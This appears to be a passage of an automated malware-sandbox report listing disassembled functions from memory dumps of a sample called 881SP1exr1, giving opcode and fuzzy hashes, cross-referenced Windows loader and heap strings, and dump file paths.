Opcode ID: 2ce866ffba288361565cbd2a7e0a5d9e6144c5abc4bcdaceee191029e4f13990
Instruction ID: 744b49658982bc1aa2b73196e74fe43f9a4341fdf550157073d3e1884a49c553
Opcode Fuzzy Hash: 2ce866ffba288361565cbd2a7e0a5d9e6144c5abc4bcdaceee191029e4f13990
Instruction Fuzzy Hash: 72F19A70B00616DFEB25CF69C894BAAB7F5FB44304F54816AE4169F3A1D734E981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01436962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01436C24
, xrefs: 0147CA51

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: 9ea19def53ea859cd60d217177de36fcddf0eb51d7f1034e9c61b8a53280b7ed
Instruction ID: 550edf24e3d2a46c4a577cefac2dc21047ac5090be5cbe85164584a585d66b5f
Opcode Fuzzy Hash: 9ea19def53ea859cd60d217177de36fcddf0eb51d7f1034e9c61b8a53280b7ed
Instruction Fuzzy Hash: 60C292B16083429FE725CF29C481BABBBE5AFC8714F05892EE9C987361D734D845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0140A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0146C1E4
FilterFullPath, xrefs: 0146C2E6
UseFilter, xrefs: 0140A1C1

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 8031f10780b02d9cc5381c1b541832c53147ddb58e60873ade9c147d42b3b7ce
Instruction ID: e775fa05aca2bb2122051e0e8f559fc19f009987ec0ac5021371457bd70cc14c
Opcode Fuzzy Hash: 8031f10780b02d9cc5381c1b541832c53147ddb58e60873ade9c147d42b3b7ce
Instruction Fuzzy Hash: D9A16C719012299BDB31DF69CC88BEAB7B8EF58714F1001EAE908A7260D7359EC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01430BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 0147A117
Failed to allocated memory for shimmed module list, xrefs: 0147A10F
minkernel\ntdll\ldrinit.c, xrefs: 0147A121

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: f7c07bdcfdc415f97b4059c065b4d73f650d1be7e3e5908ccb7389b1ead20e79
Instruction ID: e4b47257d2c991f3afa465c0b38b5f51832ec135915d17772ecdbf5e721cdf08
Opcode Fuzzy Hash: f7c07bdcfdc415f97b4059c065b4d73f650d1be7e3e5908ccb7389b1ead20e79
Instruction Fuzzy Hash: 8471F770A00206DFDB2ADFA9C841ABEB7F4FF88604F19412EE9119B365D734AD46CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01420A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01475342
HEAP[%wZ]: , xrefs: 01475335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0147534D

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: ee2655d536ee50d77b5acdbf5ce9d71e53bec95655cac540ae50b4266defecda
Instruction ID: 62badc6f3340a572aa0aba7365713c4ee6dfce181773fc8ed3194ac514e929e7
Opcode Fuzzy Hash: ee2655d536ee50d77b5acdbf5ce9d71e53bec95655cac540ae50b4266defecda
Instruction Fuzzy Hash: D761AB706003129FDB29CF69C484BAABBE1FF54704F54856EE8598F3A2D770E881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0144C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 014882DE
minkernel\ntdll\ldrinit.c, xrefs: 014882E8
Failed to reallocate the system dirs string !, xrefs: 014882D7

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: cf1096a921eee2b63a88c8cd3814b30443d3e6251f5c10c1572ca305c4da54aa
Instruction ID: cc892be8638a4a8508b4519b0335f249271123e1d10d476a0fe5fa23638906bb
Opcode Fuzzy Hash: cf1096a921eee2b63a88c8cd3814b30443d3e6251f5c10c1572ca305c4da54aa
Instruction Fuzzy Hash: A9412471141312ABE722EBA9DC80B5B7BE8AF68650F05452FF9589B2B1E770D804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 014CC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 014CC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 014CC1C5
@, xrefs: 014CC1F1

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: fe0e7a2262ba02e43be7c26cd22ed69f2d5871ff8d9bc63e451fbe2715008d73
Instruction ID: d28993cc8d716038daa6f563e1842f10e1ab4a31614f0474662865d2fe266861
Opcode Fuzzy Hash: fe0e7a2262ba02e43be7c26cd22ed69f2d5871ff8d9bc63e451fbe2715008d73
Instruction Fuzzy Hash: 85417475E00219EBDF51DFD9C891FEEBBB9AB14B00F04406FEA09A7260D7749A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014A4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 014A4172
LdrpResValidateFilePath Enter, xrefs: 014A4160
@, xrefs: 014A4225

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: e0e18005942fbcf9169cea7affe02c45bf2c7365d820df4c5dd26592034a806b
Instruction ID: 2a42ed10778d039668a10e3a17dd5a1428692619e02d64944ee0f0e0ae513e67
Opcode Fuzzy Hash: e0e18005942fbcf9169cea7affe02c45bf2c7365d820df4c5dd26592034a806b
Instruction Fuzzy Hash: F941E532A002588BEB25DBE9C844BADBBB4FF75344F5D046BD901EB7A2D6B49901CB10

Uniqueness

Uniqueness Score: -1.00%

Function 01494755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 0149488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01494888
minkernel\ntdll\ldrredirect.c, xrefs: 01494899

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 31681c29dba6e719f53d88794904afe1b301150bed6e244b0bf70c4aab931c65
Instruction ID: 3562fa43e5c10fa2f46c860e1ce2258ddb1e03c97fff85faeba872017115716f
Opcode Fuzzy Hash: 31681c29dba6e719f53d88794904afe1b301150bed6e244b0bf70c4aab931c65
Instruction Fuzzy Hash: 7B41D036A142558FCF22CE59DA40A2B7FE4AF49A54B0A059FED589B371E330D802CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01420BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0147543E
HEAP[%wZ]: , xrefs: 01475431
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01475449

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 5c35386220914a4adccbcb2d4cc736cc3bbda7877317ad231b1805bd19ee6387
Instruction ID: 9b51813b91a2a0c01b16c4de0134a33b542a9945036e1a82f8d4a271a617f296
Opcode Fuzzy Hash: 5c35386220914a4adccbcb2d4cc736cc3bbda7877317ad231b1805bd19ee6387
Instruction Fuzzy Hash: 7511AC313541129FDA2ACB1AC454BAABBE4EB5061AF58812FF406CF2B1DB30E881C754

Uniqueness

Uniqueness Score: -1.00%

Function 014920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01492104
Process initialization failed with status 0x%08lx, xrefs: 014920F3
LdrpInitializationFailure, xrefs: 014920FA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 4705c13d79ab9169572c7c0e20bf6468508d98d4d8250e40c0419c9a52873c9d
Instruction ID: 565610ed3d323427f15f4becab4949371ae783d7c8b78570ace856a37fea528b
Opcode Fuzzy Hash: 4705c13d79ab9169572c7c0e20bf6468508d98d4d8250e40c0419c9a52873c9d
Instruction Fuzzy Hash: E3F0AF75640308BFEB24E64D9C47F9A3B68EB50B58F11005EFB047B392E2F0AA548A91

Uniqueness

Uniqueness Score: -1.00%

Function 014203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01474D8A

Strings

#%u, xrefs: 01474D82

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 1b2e69e2cbe5ecc14c2bc3a79864c5b20a2d96ef1232e78577562e9524b23853
Instruction ID: 1efda603242c62ca1ee9977df377fbeda10d104f09732553a10fb8e4cb1af600
Opcode Fuzzy Hash: 1b2e69e2cbe5ecc14c2bc3a79864c5b20a2d96ef1232e78577562e9524b23853
Instruction Fuzzy Hash: 58715C71A0015A9FDB01DFA9C984BAEB7F8FF18704F15406AE905E7261EB34ED41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0141A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0141AA13
LdrResSearchResource Exit, xrefs: 0141AA25

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 3b53057eec1678d0e5d0d9b6ef7e7f2f2da502c29ae981d84415b64979b30622
Instruction ID: c233b4599fa3bdb8036d6d05f1a7e21e546e4ce9e3b69fa37489adc5161aee86
Opcode Fuzzy Hash: 3b53057eec1678d0e5d0d9b6ef7e7f2f2da502c29ae981d84415b64979b30622
Instruction Fuzzy Hash: F4E1A271A012999BEF22CF99C944BEEBBB9FF14350F24042BEA01E7369D7749941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014DA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 014DA551
`, xrefs: 014DA44B

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: ef3729df041a085a7bd4dd5bf348b9466db6cda862742e4303ddf43d50adb4f4
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 63C1E3312043429BEB24CF29C864B6BBBE5BFD4318F284A2EF696C72A0D774D505CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0148E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0148E751
Legacy, xrefs: 0148E75A

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 94f2a2ee0d4b9372b2dbf44fcb7f8a1400832606326fe6572d8a45141d406dd2
Instruction ID: 2817f1d7e7e480548e1765ba2afeede7a8ee40884cdcc84714749310a07d814e
Opcode Fuzzy Hash: 94f2a2ee0d4b9372b2dbf44fcb7f8a1400832606326fe6572d8a45141d406dd2
Instruction Fuzzy Hash: D9618B71E103099FDB14EFA9C940BAEBBB9FB54704F14402EEA49EB2A1D731E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014B43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 014B4437
MUI, xrefs: 014B4525

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: dc0a826f2a92b9fe4de51bf01ffa58d26de307d8dff8b034966ea80d40fb7100
Instruction ID: 848e69cd35be1f5621e902f2e010a349f37770d55523f71a44c528f0d1217d5d
Opcode Fuzzy Hash: dc0a826f2a92b9fe4de51bf01ffa58d26de307d8dff8b034966ea80d40fb7100
Instruction Fuzzy Hash: 14514971D0061DAEDF11DFE9CC80EEFBBB8EB58754F14052AEA11B72A1D6349A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01410540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0141063D

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: d18757a264d1f60e56cc2bf84fe32988759bc0fa888093fc320319b2f9b44946
Instruction ID: b85609824b371d4c785061297f8a115adc51f900e6419593ff4a75e357ea3ad4
Opcode Fuzzy Hash: d18757a264d1f60e56cc2bf84fe32988759bc0fa888093fc320319b2f9b44946
Instruction Fuzzy Hash: 0851DE715007428BC725EF69C5406A3BBE4AF94304F104C3FFAAA87365E730D985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0141A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0141A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 0141A309

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 5a88a7a3dd7b8fd489cd0036d169bddf9393999e958a4d753424fdc66b829a40
Instruction ID: f71c2f9bf4e196bdf40c34cd141eb9af6d03802d7493e7ca209b22c61fd44c41
Opcode Fuzzy Hash: 5a88a7a3dd7b8fd489cd0036d169bddf9393999e958a4d753424fdc66b829a40
Instruction Fuzzy Hash: 5B41D070A01699DBDB12CF69C440BAA7BB4FF94704F24406BE904DB3B5E7B5DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0144A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0144A5E4
Threadpool!, xrefs: 0144A5E9

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 2fce416a8453c51825d0e0f1186edee73b7c5c2e53f31b255b6deac6627364ca
Instruction ID: ae2819e1ce337cea85ee492835dbf5ca630aa22356f407903fdd8a74fb09ca00
Opcode Fuzzy Hash: 2fce416a8453c51825d0e0f1186edee73b7c5c2e53f31b255b6deac6627364ca
Instruction Fuzzy Hash: CA01ADB2280700AFE311DF14CD4AB2677E8E794719F05893AE69DCB1A0E774D804CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0141C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0141C8C3, 0141CA40

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: a280c71277266a5925cff8f1858ae4b101fd728d6e079ef77501c7f01dd6a149
Instruction ID: 0344f3df8ddcec8b11c3bf0f90f16f0b94de8570e88e33c92b9ab29f3c8c1adc
Opcode Fuzzy Hash: a280c71277266a5925cff8f1858ae4b101fd728d6e079ef77501c7f01dd6a149
Instruction Fuzzy Hash: 4C827FB5E402198FDB25CFA9C8847EEBBB1BF48310F14816AD919AB369D7309D42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01496420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 014965C1

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 618e835c0a0f0a4d02676039383f7124ff33cfd6d932bd0b51fad614bfc49ba4
Instruction ID: 4711dc39ac5dbeb772c9115fbba9a44510d6bf329f6b5e1b9cce3e480a0fe9f6
Opcode Fuzzy Hash: 618e835c0a0f0a4d02676039383f7124ff33cfd6d932bd0b51fad614bfc49ba4
Instruction Fuzzy Hash: FF918472900219AFDF21DF95CD85FAEBBB8EF58750F11405AF600AB2A1D775AD04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014BE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 014BE1FA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d39974815a40214c2b7708d68586972dd2f2c5a2addde562dab54fda53e23e55
Instruction ID: 72e0027bed3167456b1d7a0c54aaedd499507efed6bf816d8e4b75ceb17beb21
Opcode Fuzzy Hash: d39974815a40214c2b7708d68586972dd2f2c5a2addde562dab54fda53e23e55
Instruction Fuzzy Hash: CE91A132901609AFDB269FA6DC84FEFBB79EF95750F14001AF501A7271D7349942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0144A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 014867C9

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 2b13e30838691ce4195f5c272b739dac5bf4bae8d8642c23b81664ed6a11c0cd
Instruction ID: ada7ada3c76efaaa41f74a6a452fb86bfa51e76bd53a528b12cbb283216d40d1
Opcode Fuzzy Hash: 2b13e30838691ce4195f5c272b739dac5bf4bae8d8642c23b81664ed6a11c0cd
Instruction Fuzzy Hash: 79719F75E0120A8FDF69EF9DC5806AEBBB1BF58700F15802FE509AB361E7308941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014B4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 014B4A7F

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 003ad0c5ff50eea3418a4cc3da246b139e8ea3ed35d8e43f5647329eed788711
Instruction ID: a7544346ba6ca7a92db56b5e5cf8cb26e8108a1d20e99ef70279661cce3ad3f5
Opcode Fuzzy Hash: 003ad0c5ff50eea3418a4cc3da246b139e8ea3ed35d8e43f5647329eed788711
Instruction Fuzzy Hash: 2651B672D002259BDF10DF99D880AEEBBB8AF18614F09412FEA12B7361D3748D01CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0142E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0142E6A4

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 878476b02c4a2697c7d2df17cf20665b60c6821e57c3c290389d297b9814db53
Instruction ID: aac316a61201a2466d2cfcd2f4c328ead0d936545359a23e877ab1351fc7ebda
Opcode Fuzzy Hash: 878476b02c4a2697c7d2df17cf20665b60c6821e57c3c290389d297b9814db53
Instruction Fuzzy Hash: 6F41B5725043229BD720DB76C840B6BB7E8AFD8714F84092FF644E72A0E674D985C797

Uniqueness

Uniqueness Score: -1.00%

Function 0148C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0148C77F

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: d777e288b7a46e6e01337cc1de82140befb44d30971c28ba23430f9882c0ee60
Instruction ID: 9b19dcce5a98a7f78198aa8e71d7c7f4e8e4385682c4a7768fb972b62aea8a3b
Opcode Fuzzy Hash: d777e288b7a46e6e01337cc1de82140befb44d30971c28ba23430f9882c0ee60
Instruction Fuzzy Hash: FD4187B1D5012DABDF21EB51CC84FDEB77CAB54714F0045AAEB08AB150DB709E888FA4

Uniqueness

Uniqueness Score: -1.00%

Function 014A6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 014A6B91

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 2f267fe011f648eda1a704c2f57637e11b095b74440450969172ae7dcaaf97f3
Instruction ID: cefb53bc2b64bbd1f8522aae19829ca2ca61897832d019f8461a4006394af2c1
Opcode Fuzzy Hash: 2f267fe011f648eda1a704c2f57637e11b095b74440450969172ae7dcaaf97f3
Instruction Fuzzy Hash: B7312B31A002199ADB32DB69C844BEFB7B4DF64704F9B402AE9509F2A2D775D845CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0148CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0148CAA2

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 0b25e607c24e8f1161d80c7677708c1c20899a6d2a767dd283a04fe680fb6f08
Instruction ID: 28a5a415eb18d9be1c681344228171c2a5a4e27931e55795bdf810e510998792
Opcode Fuzzy Hash: 0b25e607c24e8f1161d80c7677708c1c20899a6d2a767dd283a04fe680fb6f08
Instruction Fuzzy Hash: 0631E336900919EFEB15EB59D885EBFBB74EB90720F01416BE905AB260D7309E04DBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0149892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0149895E

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 88fa2181d3debbd5b2c7033f72af4282156542a57149e3450d48aca3c57a9d84
Instruction ID: 6488fffdaa0d15cd854f02ffaae04ee629a6329c7bdeaf2d168c076d7a612bf1
Opcode Fuzzy Hash: 88fa2181d3debbd5b2c7033f72af4282156542a57149e3450d48aca3c57a9d84
Instruction Fuzzy Hash: 6C01D43221020BAFEB225B9EC888A577F65FF96254B04002EEA411A676CB306845CA96

Uniqueness

Uniqueness Score: -1.00%

Function 00407B1C Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

`vu, xrefs: 00407B20

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID:
String ID: `vu
API String ID: 0-3883270627
Opcode ID: 94bb9d30dd5fbafbda7a3b9179a818b37cf1aebb334e9e445c8945ac06f48248
Instruction ID: 905457428d21d6e8233ebe5b9743c4661b32c2e049128a5f483ca5ec63fbe3b3
Opcode Fuzzy Hash: 94bb9d30dd5fbafbda7a3b9179a818b37cf1aebb334e9e445c8945ac06f48248
Instruction Fuzzy Hash: 52C0803169531942D1146C0DF8406F5F378EB13655F44637BDC05D7250D585D45503CD

